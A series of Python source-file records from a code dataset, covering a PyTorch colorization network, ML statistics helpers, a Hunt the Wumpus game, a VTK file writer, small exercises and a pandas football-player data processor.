self.RF3(r3, x) # out: 1/8, 256\n        x = self.RF2(r2, x) # out: 1/4, 256\n        x = self.pred2(F.relu(x))\n        x = F.interpolate(x, scale_factor=4, mode='bilinear')\n        out_reg = self.tanh(x)\n        return out_reg\n\n\nclass HuberLoss(nn.Module):\n    def __init__(self, delta=.01):\n        super(HuberLoss, self).__init__()\n        self.delta = delta\n\n    def __call__(self, in0, in1):\n        mask = torch.zeros_like(in0)\n        mann = torch.abs(in0-in1)\n        eucl = .5 * (mann**2)\n        mask[...] = mann < self.delta\n\n        loss = eucl*mask/self.delta + (mann-.5*self.delta)*(1-mask)\n        # return torch.sum(loss,dim=1,keepdim=True)\n        return torch.mean(loss)\n\n
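# --- Added illustrative sketch; not part of the original network file ---
# The hand-rolled HuberLoss above is the same piecewise function PyTorch
# ships as nn.SmoothL1Loss(beta=delta); a quick numerical cross-check with
# random tensors (delta matches the class default of 0.01):
import torch
from torch import nn

a, b = torch.randn(4, 2), torch.randn(4, 2)
delta = 0.01
gap = (a - b).abs()
by_hand = torch.where(gap < delta, 0.5 * gap ** 2 / delta, gap - 0.5 * delta).mean()
print(torch.allclose(by_hand, nn.SmoothL1Loss(beta=delta)(a, b)))  # True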
\nclass Pnet(nn.Module):\n    def __init__(self, opt):\n        super(Pnet, self).__init__()\n        mdim = 256\n        self.Encoder = Encoder(opt) # inputs: ref: rf, rm / tar: tf, tm\n        self.Decoder = Decoder(mdim, opt) # input: m5, r4, r3, r2 >> p\n        self.opt = opt\n        self.isTrain = opt.isTrain\n        self.load_I = opt.load_I\n        self.I_path = opt.I_path\n\n    def forward(self, gray, clicks):\n        #gray = torch.unsqueeze(gray, 0)\n        #clicks = torch.unsqueeze(clicks, 0)\n        #prev = torch.unsqueeze(prev, 0)\n        tr5, tr4, tr3, tr2 = self.Encoder(gray, clicks)\n        fake_ab = self.Decoder(tr5, tr4, tr3, tr2)\n\n        return fake_ab\n\n    # load and print networks; create schedulers\n    def setup(self, opt):\n        if self.isTrain:\n            self.optimizer = optim.Adam(self.parameters(), lr = opt.lr, betas=(opt.beta1, 0.999), weight_decay=opt.weight_decay) \n            self.criterion = HuberLoss(delta=1. / opt.ab_norm)\n    \n        if self.load_I:\n            # self.load_state_dict(torch.load(self.I_path, map_location='cuda:'+str(opt.gpu_ids)).state_dict())\n            self.load_state_dict(torch.load(self.I_path))\n            print('[Propagation net] loading Pnet succeeded')\n    \n    def calc_loss(self, real, fake):\n        self.fake = fake\n        self.real = real\n        loss = self.criterion(self.fake, self.real)\n\n        return loss","sub_path":"models/.ipynb_checkpoints/propagation_net_v2-checkpoint.py","file_name":"propagation_net_v2-checkpoint.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"602399497","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 16 13:35:35 2014\n\n@author: liorf\n\"\"\"\n\nfrom collections import Counter\nfrom math import log, sqrt\n\ndef entropy(labels):\n    '''Calculate Shannon entropy for a set of labels. \n    Note that this works even for non-binary labels.\n    This is useful for decision trees.\n    \n    Returns a non-negative float (at most log2 of the number of distinct labels; 0.0 to 1.0 for binary labels).\n    '''\n    counts= Counter(labels)\n    freqs= [float(count)/len(labels) for (value, count) in counts.most_common()]\n    nonzero_freqs= [f for f in freqs if f > 0]\n    if len(nonzero_freqs) <= 1:\n        return 0.0 #edge case\n    return sum([-log(f, 2)*f for f in nonzero_freqs])\n\n\ndef information_gain(old_labels, feature_values):\n    '''Calculate information gain by splitting old_labels according to feature_values.\n    Note that this works for nominal features as well as binary (but it tends to prefer features with many values. There is a correction known as information gain ratio, but it is beyond the scope of the course).\n    \n    Returns a float\n    '''\n    current_entropy= entropy(old_labels)\n    \n    conditional_entropy= 0.0\n    for value in frozenset(feature_values):\n        indices_for_value= [i for (i,v) in enumerate(feature_values) if v==value]\n        value_probability= float(len(indices_for_value))/len(feature_values)\n        \n        conditional_labels= [label for (i, label) in enumerate(old_labels) if i in indices_for_value]\n        conditional_entropy+= value_probability*entropy(conditional_labels)\n    \n    return current_entropy - conditional_entropy\n    \ndef l2_distance(example1, example2):\n    '''Calculate distance between two examples based on the L2-Norm (euclidean distance).\n    Note that both examples must be lists of the same length!\n    \n    Returns a float representing the distance.\n    '''\n    if len(example1)!=len(example2):\n        raise ValueError('cannot calculate distance on vectors of different dimensions: ' + str(len(example1)) + ', ' + str(len(example2)))\n    return sqrt(sum([(v1-v2)**2 for (v1,v2) in zip(example1,example2)]))\n    \n
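# --- Added worked example; the toy values are invented, not from the file ---
# A feature that splits the classes perfectly removes all of the 1-bit
# starting entropy, so information_gain returns 1.0 here:
example_labels = ['a', 'a', 'b', 'b']
example_feature = [0, 0, 1, 1]
print(entropy(example_labels))                            # 1.0
print(information_gain(example_labels, example_feature))  # 1.0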
SIGNIFICANCE_THRESHOLD = 0.05\ndef student_paired_t_test(original_measurements, measurements_after_alteration):\n    '''This is the paired T-test (for repeated measurements):\n    Given two sets of measurements on the SAME data points (folds) before and after some change (in our case, before and after the local search step),\n    checks whether or not they come from the same distribution. \n    \n    This T-test assumes the measurements come from normal distributions (if you want, you can use the Mann-Whitney U test (scipy.stats.mannwhitneyu) to check this assumption)\n    \n    Returns: the probability that the measurements came from the same distribution.\n    Note that since we know if the new measurements are better or not, we only want the one-sided probability in that direction, hence the halving of the two-sided p-value below.\n    For the sake of this assignment, we will say the results are SIGNIFICANT (they truly are different) if this value is less than 0.05.\n    Also returns: is_significant = binary value stating whether the result is statistically significant. is_better = binary value stating whether the new measurements are better than the old ones.\n    '''\n    try:\n        from scipy.stats import ttest_rel\n    except ImportError:\n        raise Exception('You must either install scipy, or find an online implementation of paired T-test')\n    test_value, probability= ttest_rel(original_measurements, measurements_after_alteration)\n    is_significant= probability/2 < SIGNIFICANCE_THRESHOLD\n    is_better= sum(original_measurements) < sum(measurements_after_alteration) #should actually compare averages, but there's no need since it's the same number of measurements.\n    return probability/2 if is_better else 1-probability/2, is_significant, is_better","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"427945026","text":"n = int(input())\r\nst = bin(n).replace(\"0b\", \"\")\r\nmax_run = 0\r\ncount = 0\r\nfor i in st:\r\n    if i == '1':\r\n        count += 1\r\n        if count > max_run:\r\n            max_run = count\r\n    else:\r\n        count = 0\r\nprint(max_run)\r\n","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"28422211","text":"#Hunt the Wumpus\r\n#From a vintage BASIC game program\r\n#by CREATIVE COMPUTING MORRISTOWN, NEW JERSEY\r\n#Rewritten in Python by Gordon Reeder\r\n# Python 3.4\r\n# ** To do **\r\n# - Make connections within cave random. So that no two caves are the same.\r\n\r\nimport random\r\nimport sys\r\n\r\ndef show_instructions():\r\n    print (\"\"\"\r\n    WELCOME TO 'HUNT THE WUMPUS'\r\n    THE WUMPUS LIVES IN A CAVE OF 16 ROOMS.\r\n    13 14 15 16\r\n    9 10 11 12\r\n    5 6 7 8\r\n    1 2 3 4\r\n    \r\n    WARNINGS:\r\n    WHEN YOU ARE ONE ROOM AWAY FROM WUMPUS OR A HAZARD,\r\n    THE COMPUTER SAYS:\r\n    WUMPUS: 'STENCH'\r\n    PIT : 'BREEZE'\r\n    \"\"\")\r\n\r\n\r\nclass Room:\r\n    \"\"\"Defines a room. \r\n    A room has a name (or number),\r\n    a list of other rooms that it connects to,\r\n    and a description. 
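    For illustration only (an added sketch, not from the original game): a
    hypothetical snippet wiring and querying a room looks like

        r = Room(number=1)
        r.add_connect(2)             # east neighbour on the 4x4 grid
        r.add_connect(5)             # north neighbour
        r.is_valid_connect(2)        # -> True
        r.get_number_of_connects()   # -> 2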
\r\n    How these rooms are built into something larger \r\n    (cave, dungeon, skyscraper) is up to you.\r\n    \"\"\"\r\n\r\n    def __init__(self, **kwargs):\r\n        self.number = 0\r\n        self.name =''\r\n        self.connects_to = [] #These are NOT objects\r\n        self.description = \"\"\r\n        for key, value in kwargs.items():\r\n            setattr(self, key, value)\r\n    def __str__(self):\r\n        return str(self.number)\r\n\r\n    def remove_connect(self, arg_connect):\r\n        if arg_connect in self.connects_to:\r\n            self.connects_to.remove(arg_connect)\r\n\r\n    def add_connect(self, arg_connect):\r\n        if arg_connect not in self.connects_to:\r\n            self.connects_to.append(arg_connect)\r\n\r\n    def is_valid_connect(self, arg_connect):\r\n        return arg_connect in self.connects_to\r\n\r\n    def get_number_of_connects(self):\r\n        return len(self.connects_to)\r\n\r\n    def get_connects(self):\r\n        return self.connects_to\r\n\r\n    def describe(self):\r\n        if len(self.description) > 0:\r\n            print(self.description)\r\n        else:\r\n            print(\"You are in room {}.\\nPassages lead to {}\".format(self.number, self.connects_to))\r\n    \r\n\r\nclass Thing:\r\n    \"\"\"Defines the things that are in the cave.\r\n    That is the Wumpus, Player, pits and gold.\r\n    \"\"\"\r\n\r\n    def __init__(self, **kwargs):\r\n        self.location = 0 # this is a room object\r\n        for key, value in kwargs.items():\r\n            setattr(self, key, value)\r\n\r\n    def move(self, a_new_location):\r\n        if a_new_location.number in self.location.connects_to or a_new_location == self.location:\r\n            self.location = a_new_location\r\n            return True\r\n        else:\r\n            return False\r\n\r\n    def validate_move(self, a_new_location):\r\n        return a_new_location.number in self.location.connects_to or a_new_location == self.location\r\n    \r\n    def get_location(self):\r\n        return self.location.number\r\n\r\n    def wakeup(self, a_cave):\r\n        if random.randint(0, 3): # P=.75 that we will move.\r\n            self.location = a_cave[random.choice(self.location.connects_to) -1]\r\n    \r\n    def is_hit(self, a_room):\r\n        return self.location == a_room\r\n\r\ndef create_things(a_cave):\r\n    # a_cave = rooms 1 - 16 (list indices 0 - 15)\r\n    Things=[]\r\n    Things.append(Thing(location = a_cave[0])) # The player starts in room 1\r\n    checker = False\r\n\r\n    while not checker:\r\n        Samples = random.sample(a_cave, 5) #Wumpus, Pit1, Pit2, Pit3, Gold\r\n        Pits = [Samples[1], Samples[2], Samples[3]]\r\n        # never let both neighbours of a corner room be pits (corners 1, 4, 13, 16)\r\n        forbiddenRoom1 = [a_cave[1], a_cave[4]]\r\n        forbiddenRoom2 = [a_cave[2], a_cave[7]]\r\n        forbiddenRoom3 = [a_cave[13], a_cave[8]]\r\n        forbiddenRoom4 = [a_cave[11], a_cave[14]]\r\n        \r\n        checker = True\r\n        \r\n        if Samples[0] == a_cave[0]:\r\n            checker = False\r\n        if Samples[1] == a_cave[0] or Samples[2] == a_cave[0] or Samples[3] == a_cave[0]:\r\n            checker = False\r\n        if (len(set(forbiddenRoom1) - set(Pits)) == 0):\r\n            checker = False\r\n        if (len(set(forbiddenRoom2) - set(Pits)) == 0):\r\n            checker = False\r\n        if (len(set(forbiddenRoom3) - set(Pits)) == 0):\r\n            checker = False\r\n        if (len(set(forbiddenRoom4) - set(Pits)) == 0):\r\n            checker = False\r\n\r\n    for room in Samples:\r\n        Things.append(Thing(location = room))\r\n\r\n    return Things\r\n\r\ndef create_cave():\r\n    # First create a list of all the rooms.\r\n    for number in range(16):\r\n        Cave.append(Room(number = number +1))\r\n\r\n    # Then stitch them together on the 4x4 grid shown in show_instructions().\r\n    for idx, room in enumerate(Cave):\r\n        #connect to the room to the left\r\n        if idx not in (0, 4, 8, 12):\r\n            room.add_connect(Cave[idx - 1].number)\r\n        #connect to the room to the right\r\n        if idx not in (3, 7, 11, 15):\r\n            room.add_connect(Cave[idx + 1].number)\r\n        #connect to the rooms above and below\r\n        if idx <= 11:\r\n            room.add_connect(Cave[idx + 4].number)\r\n        if idx >= 4:\r\n            room.add_connect(Cave[idx - 4].number)\r\n
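# --- Added illustrative sketch; not part of the original game ---
# Quick sanity check for the wiring above: every passage should be two-way.
# Hypothetical helper, handy when making the cave random (the "to do" at the
# top of this file):
def check_cave_symmetry(cave):
    # returns the (room, neighbour) pairs whose reverse link is missing
    return [(room.number, other)
            for room in cave for other in room.connects_to
            if room.number not in cave[other - 1].connects_to]

# After create_cave() has run, check_cave_symmetry(Cave) should return [].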
\r\n# ============ BEGIN HERE ===========\r\n\r\nCave = []\r\ncreate_cave()\r\n# Make player, wumpus, pits and put into cave.\r\n\r\nPlayer, Wumpus, Pit1, Pit2, Pit3, Gold = create_things(Cave)\r\n\r\nArrows = 5\r\n\r\n# Now play the game\r\n\r\nprint(\"\"\"\\n \r\n13 14 15 16\r\n9 10 11 12\r\n5 6 7 8\r\n1 2 3 4\r\n \\n\r\n    Welcome to the cave, Great White Hunter.\r\n    You are hunting the Wumpus.\r\n    On any turn you can move or shoot.\r\n    Commands are entered in the form of ACTION LOCATION\r\n    IE: 'SHOOT 12' or 'MOVE 8'\r\n    type 'HELP' for instructions.\r\n    'QUIT' to end the game.\r\n    \"\"\")\r\n\r\n\r\nwhile True:\r\n    Player.location.describe()\r\n    #Check each neighbouring room for hazards.\r\n    for room in Player.location.connects_to:\r\n        if Wumpus.location.number == room:\r\n            print(\"Stench\")\r\n        if Pit1.location.number == room or Pit2.location.number == room or Pit3.location.number == room:\r\n            print(\"Breeze\")\r\n        \r\n        if Gold.location.number == room:\r\n            print(\"Gold Found. Press T to take the gold\")\r\n    raw_command = input(\"\\n> \")\r\n    command_list = raw_command.split(' ')\r\n    command = command_list[0].upper()\r\n    if len(command_list) > 1:\r\n        try:\r\n            move = Cave[int(command_list[1]) -1]\r\n        except:\r\n            print(\"\\n **What??\")\r\n            continue\r\n    else:\r\n        move = Player.location\r\n    if command == 'TAKE' or command == 'T':\r\n        # TODO : TAKE GOLD ACTION\r\n        continue\r\n    if command == 'HELP' or command == 'H':\r\n        show_instructions()\r\n        continue\r\n\r\n    elif command == 'QUIT' or command == 'Q':\r\n        print(\"\\nOK, Bye.\")\r\n        sys.exit()\r\n\r\n    elif command == 'MOVE' or command == 'M':\r\n        if Player.move(move):\r\n            if Player.location == Wumpus.location:\r\n                print(\"... OOPS! BUMPED A WUMPUS!\")\r\n        else:\r\n            print(\"\\n **You can't get there from here\")\r\n            continue\r\n\r\n    elif command == 'SHOOT' or command == 'S':\r\n        if Player.validate_move(move):\r\n            print(\"\\n-Twang-\") \r\n            if Wumpus.location == move:\r\n                print(\"\\n Good Shooting!! You hit the Wumpus. \\n Wumpi will have their revenge.\\n\")\r\n                sys.exit()\r\n        else:\r\n            print(\"\\n** Stop trying to shoot through walls.\")\r\n\r\n        Wumpus.wakeup(Cave)\r\n        Arrows -= 1\r\n        if Arrows == 0:\r\n            print(\"\\n You are out of arrows\\n Better luck next time\\n\")\r\n            sys.exit()\r\n    \r\n    else:\r\n        print(\"\\n **AVAILABLE COMMANDS : \\n 1. MOVE {NUMBER} \\n 2. SHOOT {NUMBER} \\n 3. HELP \\n 4. QUIT\")\r\n        continue\r\n\r\n    \r\n    # By now the player has moved. 
See what happened.\r\n    # Handle problems with pits, bats and wumpus.\r\n\r\n    if Player.location == Wumpus.location:\r\n        print(\"The Wumpus ate you\\n\")\r\n        sys.exit()    \r\n\r\n    elif Player.location == Pit1.location or Player.location == Pit2.location or Player.location == Pit3.location:\r\n        print(\"You fell into a pit\\n\")\r\n        sys.exit()\r\n\r\n    else: # Keep playing\r\n        pass\r\n","sub_path":"wumpus.py","file_name":"wumpus.py","file_ext":"py","file_size_in_byte":9006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"322795320","text":"\"\"\" VTK file driver based on documentation from\nhttp://vtk.org/VTK/img/file-formats.pdf \"\"\"\n\nimport sys\nimport operator\nfrom xml.etree import ElementTree as ET\nfrom xml.dom import minidom\nfrom functools import reduce\n\ndef mp2vtp(mp_list, f, **kwargs):\n    \"\"\" Write a list of Multipoint instances to a serial VTK PolyData (.vtp)\n    file.\n\n    kwargs are:\n\n    *byte_order* : 'LittleEndian' or 'BigEndian' to force a byte\n    order other than the native order\n\n    *write_pointdata* : {bool}, default True, to write point attributes\n    \"\"\"\n\n    vtype = 'PolyData'\n    vbyteorder = kwargs.get('byte_order', 'undef')\n    if vbyteorder == 'undef':\n        if sys.byteorder == 'little':\n            vbyteorder = 'LittleEndian'\n        else:\n            vbyteorder = 'BigEndian'\n    if vbyteorder not in ('LittleEndian', 'BigEndian'):\n        raise Exception(\"byte_order must be 'LittleEndian' or 'BigEndian'\")\n    write_pointdata = kwargs.get('write_pointdata', True)\n\n    vversion = str(kwargs.get('version', 0.1))\n\n    xdoc = ET.Element('VTKFile', attrib={'type':vtype,\n                                         'version':vversion,\n                                         'byte_order':vbyteorder})\n\n    xugrid = ET.SubElement(xdoc, vtype)\n\n    if hasattr(mp_list, \"_geotype\") and mp_list._geotype == \"Multipoint\":\n        mp_list = [mp_list]\n\n    for mp in mp_list:\n\n        xpiece = ET.Element('Piece', attrib={'NumberOfPoints':str(len(mp)),\n                                             'NumberOfVerts':str(len(mp))})\n        xugrid.append(xpiece)\n\n        # Point coordinates\n        xpts = ET.Element('Points')\n        xdarray = ET.Element('DataArray',\n                             attrib={'NumberOfComponents':'{0}'.format(mp.rank),\n                                     'type':'Float32',\n                                     'format':'ascii'})\n        xdarray.text = reduce(lambda a,b: str(a)+' '+str(b), # Concat points\n                              map(lambda pt: # Form points\n                                  reduce(lambda a,b: str(a)+' '+str(b), pt),\n                                  mp)) # Concat coords\n\n        xpts.append(xdarray)\n        xpiece.append(xpts)\n\n        # Point data\n        if False in (a is None for a in mp.data) and write_pointdata:\n            if hasattr(mp.data, 'keys'):\n                datakeys = mp.data.keys()\n                datavals = mp.data.values()\n            else:\n                datakeys = ['point_data']\n                datavals = [mp.data]\n\n            xptdata = ET.Element('PointData')\n            for key, vals in zip(datakeys, datavals):\n                if isinstance(vals[0], int):\n                    dtype = 'Int32'\n                elif isinstance(vals[0], float):\n                    dtype = 'Float32'\n                else:\n                    dtype = 'String'\n                xdarray = ET.Element('DataArray', attrib={'type':dtype,\n                                                          'format':'ascii',\n                                                          'Name':str(key)})\n                xdarray.text = reduce(lambda a,b: str(a)+' '+str(b), vals)\n                xptdata.append(xdarray)\n\n            xpiece.append(xptdata)\n\n        # Cell data\n        xcell = ET.Element('Verts')\n        connectivity = ET.Element('DataArray', attrib={'type':'Int32',\n                                                       'Name':'connectivity',\n                                                       'format':'ascii'})\n        connectivity.text = reduce(operator.add,\n                                   [str(a)+' ' for a in range(len(mp))])\n\n        offsets = ET.Element('DataArray', attrib={'type':'Int32',\n                                                  'Name':'offsets',\n                                                  'format':'ascii'})\n        #offsets.text = str(len(mp))\n        offsets.text = reduce(operator.add,\n                              [str(a+1)+' ' for a in range(len(mp))])\n\n\n        xcell.append(connectivity)\n        xcell.append(offsets)\n        
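        # --- Added explanatory note; not in the original driver ---
        # In the VTK XML format, Verts cell k spans
        # connectivity[offsets[k-1]:offsets[k]] (offsets are cumulative ends).
        # With one single-vertex cell per point, e.g. for 3 points:
        #   connectivity = "0 1 2 "   and   offsets = "1 2 3 "
        # which is why the offsets text above uses str(a+1).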
xpiece.append(xcell)\n\n pretty_xml = minidom.parseString(ET.tostring(xdoc)).toprettyxml()\n\n f.write(pretty_xml)\n return\n\n","sub_path":"karta/vector/vtk.py","file_name":"vtk.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"284833696","text":"\nn = int(input())\nl = map(int,input().split())\nls = list(l)\ndict = {}\nfor i in ls:\n \n \n if i in dict:\n dict[i] += 1\n else:\n \n dict[i] = 1\nfor key,val in dict.items():\n \n if val == 1:\n \n print(key,end=' ')\n \n","sub_path":"uniquenum.py","file_name":"uniquenum.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"548312998","text":"# this is just sample code\nprint(\"this string of words\")\napple = None\nbanana = None\napple = 1\nprint(str(apple))\nbanana = 300\ncoconut = 'some words'\ndragon_fruit = [ 8 , 9 , 10 , 11 , 12 ]\ncrazy_list = [ 1 , 2 , 'tree bark' ]\nresult = 1 + 2\nprint(str(result))\nif True:\n\tprint(\"this is a 1 line if statement\")\n\nif 1 == 1:\n\tprint(\"this should print\")\n\nprint(\"there should be nothing between this line\")\nif 1 == 2:\n\tprint(\"it should not print this\")\n\nif 1 == 2:\n\tprint(\"it should ! print this end if\")\n\nprint(\"and this line\")\ncircle = [ -1 , 0 , 1 , 2 , 3 ]\nfor index in circle:\n\tprint(str(index))\n\n# this is a comment\ndef test(item):\n\tprint(str(item))\n\nother = 'it works'\ntest(other)\nimport alternate\nfrom library import test\ntest.test_function()\ntest.test_function()\ncrazy_list = [ 1 , 2 , 'tree bark' ]\nsequence = [ 0 , 1 , 2 ]\nfor item in sequence:\n\tprint(crazy_list[item])\n\nimport numpy as numb_pie\narray = [ 2 , 3 , 4 ]\nprint(\"array is \" + str(array))\nprint(\"use array of numb pie on \" + str(array))\noutput = numb_pie.array(array)\nprint(\"output of array of numb pie is \" + str(output))\n\n\ndef fibonacci(number):\n\tif number == 0:\n\t\treturn 0\n\t\n\tif number == 1:\n\t\treturn 1\n\t\n\tanswer_1 = fibonacci(number - 1)\n\tanswer_2 = fibonacci(number - 2)\n\treturn answer_1 + answer_2\n\noutput = fibonacci(0)\nprint(\"step 1: output = \" + str(output))\noutput = fibonacci(1)\nprint(\"step 2: output = \" + str(output))\noutput = fibonacci(2)\nprint(\"step 3: output = \" + str(output))\noutput = fibonacci(3)\nprint(\"step 4: output = \" + str(output))\n","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"70952336","text":"from aio_proxy.response.formatters.bilan_financier import format_bilan\nfrom aio_proxy.response.formatters.collectivite_territoriale import (\n format_collectivite_territoriale,\n)\nfrom aio_proxy.response.formatters.dirigeants import format_dirigeants\nfrom aio_proxy.response.formatters.etablissements import (\n format_etablissements_list,\n format_siege,\n)\nfrom aio_proxy.response.formatters.insee_bool import format_insee_bool\nfrom aio_proxy.response.formatters.non_diffusible import (\n hide_non_diffusible_fields,\n)\nfrom aio_proxy.response.formatters.selected_fields import (\n select_admin_fields,\n select_fields_to_include,\n)\nfrom aio_proxy.response.helpers import format_nom_complet, get_value, is_dev_env\n\n\ndef format_search_results(results, search_params):\n \"\"\"Format API response to follow a specific schema.\"\"\"\n formatted_results = []\n for result in results:\n\n def 
get_field(field, default=None):\n return get_value(result[\"unite_legale\"], field, default)\n\n # Hide some fields if non-diffusible\n is_non_diffusible = (\n True if get_field(\"statut_diffusion_unite_legale\") != \"O\" else False\n )\n\n result_formatted = {\n \"siren\": get_field(\"siren\"),\n \"nom_complet\": format_nom_complet(\n get_field(\"nom_complet\"),\n get_field(\"sigle\"),\n get_field(\"denomination_usuelle_1_unite_legale\"),\n get_field(\"denomination_usuelle_2_unite_legale\"),\n get_field(\"denomination_usuelle_3_unite_legale\"),\n ),\n \"nom_raison_sociale\": get_field(\"nom_raison_sociale\"),\n \"sigle\": get_field(\"sigle\"),\n \"nombre_etablissements\": int(get_field(\"nombre_etablissements\", default=1)),\n \"nombre_etablissements_ouverts\": int(\n get_field(\"nombre_etablissements_ouverts\", default=0)\n ),\n \"siege\": format_siege(get_field(\"siege\"), is_non_diffusible),\n \"activite_principale\": get_field(\"activite_principale_unite_legale\"),\n \"categorie_entreprise\": get_field(\"categorie_entreprise\"),\n \"annee_categorie_entreprise\": get_field(\"annee_categorie_entreprise\"),\n \"date_creation\": get_field(\"date_creation_unite_legale\"),\n \"date_mise_a_jour\": get_field(\"date_mise_a_jour_unite_legale\"),\n \"dirigeants\": format_dirigeants(\n get_field(\"dirigeants_pp\"),\n get_field(\"dirigeants_pm\"),\n is_non_diffusible,\n ),\n \"etat_administratif\": get_field(\"etat_administratif_unite_legale\"),\n \"nature_juridique\": get_field(\"nature_juridique_unite_legale\"),\n \"section_activite_principale\": get_field(\"section_activite_principale\"),\n \"tranche_effectif_salarie\": get_field(\n \"tranche_effectif_salarie_unite_legale\"\n ),\n \"annee_tranche_effectif_salarie\": get_field(\n \"annee_tranche_effectif_salarie\"\n ),\n \"statut_diffusion\": get_field(\"statut_diffusion_unite_legale\"),\n \"matching_etablissements\": format_etablissements_list(\n get_value(result, \"matching_etablissements\"), is_non_diffusible\n ),\n \"finances\": format_bilan(get_field(\"bilan_financier\")),\n \"complements\": {\n \"collectivite_territoriale\": format_collectivite_territoriale(\n get_field(\"colter_code\"),\n get_field(\"colter_code_insee\"),\n get_field(\"colter_elus\"),\n get_field(\"colter_niveau\"),\n ),\n \"convention_collective_renseignee\": get_field(\n \"convention_collective_renseignee\"\n ),\n \"egapro_renseignee\": get_field(\"egapro_renseignee\"),\n \"est_bio\": get_field(\"est_bio\"),\n \"est_entrepreneur_individuel\": get_field(\n \"est_entrepreneur_individuel\", default=False\n ),\n \"est_entrepreneur_spectacle\": get_field(\"est_entrepreneur_spectacle\"),\n \"est_ess\": format_insee_bool(\n get_field(\"economie_sociale_solidaire_unite_legale\")\n ),\n \"est_finess\": get_field(\"est_finess\"),\n \"est_organisme_formation\": get_field(\"est_organisme_formation\"),\n \"est_qualiopi\": get_field(\"est_qualiopi\"),\n \"liste_id_organisme_formation\": get_field(\n \"liste_id_organisme_formation\"\n ),\n \"est_rge\": get_field(\"est_rge\"),\n \"est_service_public\": get_field(\"est_service_public\"),\n \"est_societe_mission\": format_insee_bool(\n get_field(\"est_societe_mission\")\n ),\n \"est_uai\": get_field(\"est_uai\"),\n \"identifiant_association\": get_field(\n \"identifiant_association_unite_legale\"\n ),\n \"statut_entrepreneur_spectacle\": get_field(\n \"statut_entrepreneur_spectacle\",\n ),\n },\n }\n\n # Select fields to return\n if search_params.minimal:\n select_fields_to_include(search_params.include, result_formatted)\n\n if 
search_params.include_admin:\n etablissements = format_etablissements_list(\n get_field(\"etablissements\"), is_non_diffusible\n )\n score = get_value(result, \"meta\")[\"score\"]\n slug = get_field(\"slug\")\n select_admin_fields(\n search_params.include_admin,\n etablissements,\n score,\n slug,\n result_formatted,\n )\n\n # Hide most fields if unité légale is non-diffusible\n if is_non_diffusible:\n result_formatted = hide_non_diffusible_fields(result_formatted)\n\n # Include search score and tree field for dev environment\n if is_dev_env():\n result_formatted[\"meta\"] = get_value(result, \"meta\")\n formatted_results.append(result_formatted)\n return formatted_results\n","sub_path":"aio/aio-proxy/aio_proxy/response/format_search_results.py","file_name":"format_search_results.py","file_ext":"py","file_size_in_byte":6219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"277931219","text":"#!/usr/bin/env python \nfrom distutils.core import setup\nimport os.path\n\nPACKAGE = 'wolfit'\nDIST_NAME = 'wolfit'\n\nsetup(name = DIST_NAME,\n description = 'The Wolfit dataflow engine.',\n version = '0.2',\n author = 'Philip van Oosten',\n author_email = 'philip.vanoosten@hogent.be',\n long_description = open('README.rst').read(),\n license = 'GNU GPLv2',\n packages = [PACKAGE, ],\n package_dir = {PACKAGE: os.path.join('src', PACKAGE)},\n url = 'http://code.google.com/p/wolfit/',\n scripts = ['scripts/wolfit-tools.py'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"441462981","text":"from frictionless.field import Field\nfrom frictionless.schema import Schema\nfrom inflection import titleize\n\nimport pandas\nimport numpy\n\nfrom .base import BaseProcessor\n\nclass PlayersProcessor(BaseProcessor):\n\n name = 'players'\n description = \"Players in `clubs`. 
One row per player.\"\n\n def process_segment(self, segment):\n \n prep_df = pandas.DataFrame()\n\n json_normalized = pandas.json_normalize(segment.to_dict(orient='records'))\n\n self.set_checkpoint('json_normalized', json_normalized)\n\n href_parts = json_normalized['href'].str.split('/', 5, True)\n parent_href_parts = json_normalized['parent.href'].str.split('/', 5, True)\n\n prep_df['player_id'] = href_parts[4]\n prep_df['current_club_id'] = parent_href_parts[4]\n prep_df['name'] = self.url_unquote(href_parts[1])\n prep_df['pretty_name'] = prep_df['name'].apply(lambda x: titleize(x))\n prep_df['country_of_birth'] = json_normalized['place_of_birth'].str.replace('Heute: ', '', regex=False)\n prep_df['country_of_citizenship'] = json_normalized['citizenship']\n prep_df['date_of_birth'] = (\n pandas\n .to_datetime(\n arg=json_normalized['date_of_birth'],\n errors='coerce'\n )\n )\n prep_df['position'] = (\n json_normalized['position']\n .str.split(' - ', 3, True)[0]\n .str.capitalize()\n )\n prep_df['sub_position'] = json_normalized['position'].str.split(' - ', 3, True)[1]\n prep_df['foot'] = (\n json_normalized['foot']\n .replace('N/A', numpy.nan)\n .str.capitalize()\n )\n prep_df['height_in_cm'] = (\n (json_normalized['height']\n .replace('N/A', numpy.nan)\n .str.split('m', 2, True)[0]\n .str.replace(',','.')\n .astype(dtype=float) * 100\n ).fillna(0).astype(int)\n )\n\n prep_df['url'] = self.url_prepend(json_normalized['href'])\n\n self.set_checkpoint('prep', prep_df)\n return prep_df\n\n def process(self):\n self.prep_dfs = [self.process_segment(prep_df) for prep_df in self.raw_dfs]\n self.prep_df = pandas.concat(self.prep_dfs, axis=0).drop_duplicates(\n subset='player_id',\n keep='last'\n )\n\n def get_validations(self):\n return []\n\n def resource_schema(self):\n self.schema = Schema()\n\n self.schema.add_field(Field(name='player_id', type='integer'))\n self.schema.add_field(Field(name='current_club_id', type='integer'))\n self.schema.add_field(Field(name='name', type='string'))\n self.schema.add_field(Field(name='pretty_name', type='string'))\n 